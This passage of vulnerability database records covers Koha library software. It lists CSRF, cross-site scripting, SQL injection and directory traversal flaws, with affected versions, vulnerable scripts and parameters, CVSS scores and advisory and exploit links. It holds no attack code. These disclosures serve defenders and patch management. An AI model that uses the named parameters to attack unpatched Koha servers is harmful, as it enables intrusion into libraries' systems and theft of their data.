"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Severity ?
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
"versionEndExcluding": "3.14.16",
"versionStartIncluding": "3.14.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
"versionEndExcluding": "3.16.12",
"versionStartIncluding": "3.16.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A50154EE-37E5-4872-8A1C-57AA8132E91B",
"versionEndExcluding": "3.18.8",
"versionStartIncluding": "3.18.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE6E0A0A-BA1C-4F6B-92E0-796FFD77AF41",
"versionEndExcluding": "3.20.1",
"versionStartIncluding": "3.20.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades Cross-Site Request Forgery (CSRF) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos (1) secuestren la autenticaci\u00f3n de los administradores para peticiones que crean un usuario mediante una petici\u00f3n a members/memberentry.pl, (2) otorguen a un usuario el permiso superlibrarian mediante una peticiones a members/member-flags.pl o (3) secuestrar la autenticaci\u00f3n de usuarios arbitrarios para peticiones que llevan a cabo ataques Cross-Site Scripting (XSS) mediante el par\u00e1metro addshelf en opac-shelves.pl."
}
],
"id": "CVE-2015-4630",
"lastModified": "2024-11-21T02:31:26.230",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.1,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-10-18T21:29:00.270",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
"versionEndExcluding": "3.14.16",
"versionStartIncluding": "3.14.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
"versionEndExcluding": "3.16.12",
"versionStartIncluding": "3.16.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A50154EE-37E5-4872-8A1C-57AA8132E91B",
"versionEndExcluding": "3.18.8",
"versionStartIncluding": "3.18.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE6E0A0A-BA1C-4F6B-92E0-796FFD77AF41",
"versionEndExcluding": "3.20.1",
"versionStartIncluding": "3.20.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades Cross-Site Scripting (XSS) en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos inyecten scripts web o HTML arbitrarios mediante (1) el par\u00e1metro tag en opac-search.pl; (2) el par\u00e1metro value en authorities/authorities-home.pl; (3) el par\u00e1metro delay en acqui/lateorders.pl; (4) los par\u00e1metros authtypecode o (5) tagfield en admin/auth_subfields_structure.pl; (6) el par\u00e1metro tagfield en admin/marc_subfields_structure.pl; (7) el par\u00e1metro limit en catalogue/search.pl; (8) los par\u00e1metros bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter o (13) title_filter en serials/serials-search.pl; o (14) los par\u00e1metros author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from o (22) suggesteddate_to en suggestion/suggestion.pl o los par\u00e1metros (23) direction, (24) display o (25) addshelf en opac-shelves.pl."
}
],
"id": "CVE-2015-4631",
"lastModified": "2024-11-21T02:31:26.413",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-10-18T21:29:00.723",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Release Notes",
"Vendor Advisory"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Severity ?
Summary
SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666 | Exploit, Issue Tracking, Vendor Advisory | |
| cve@mitre.org | http://koha-community.org/security-release-february-2014/ | Vendor Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2014/02/07/10 | Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2014/02/10/3 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666 | Exploit, Issue Tracking, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://koha-community.org/security-release-february-2014/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2014/02/07/10 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2014/02/10/3 | Mailing List, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
"versionEndExcluding": "3.08.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
"versionEndExcluding": "3.10.13",
"versionStartIncluding": "3.10.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
"versionEndExcluding": "3.12.10",
"versionStartIncluding": "3.12.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
"versionEndExcluding": "3.14.03",
"versionStartIncluding": "3.14.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924."
},
{
"lang": "es",
"value": "Una vulnerabilidad de inyecci\u00f3n SQL en la funci\u00f3n MARC framework import/export (archivo admin/import_export_framework.pl) en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10 y versiones 3.14.x anteriores a 3.14.3, permite usuarios autenticados remotos para ejecutar comandos SQL arbitrarios por medio de vectores no especificados. NOTA: esto puede ser aprovechado por los atacantes remotos utilizando el CVE-2014-1924."
}
],
"id": "CVE-2014-1925",
"lastModified": "2024-11-21T02:05:17.213",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-24T17:15:12.407",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Severity ?
Summary
Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
"versionEndExcluding": "3.08.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
"versionEndExcluding": "3.10.13",
"versionStartIncluding": "3.10.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
"versionEndExcluding": "3.12.10",
"versionStartIncluding": "3.12.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
"versionEndExcluding": "3.14.03",
"versionStartIncluding": "3.14.00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de Salto de Directorio en el (1) editor de ayuda de la interfaz del personal (archivo edithelp.pl) o (2) el archivo member-picupload.pl en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10, y versiones 3.14.x anteriores a 3.14.3, permiten a atacantes remotos escribir en archivos arbitrarios por medio de vectores no especificados."
}
],
"id": "CVE-2014-1923",
"lastModified": "2024-11-21T02:05:16.930",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-24T17:15:12.250",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
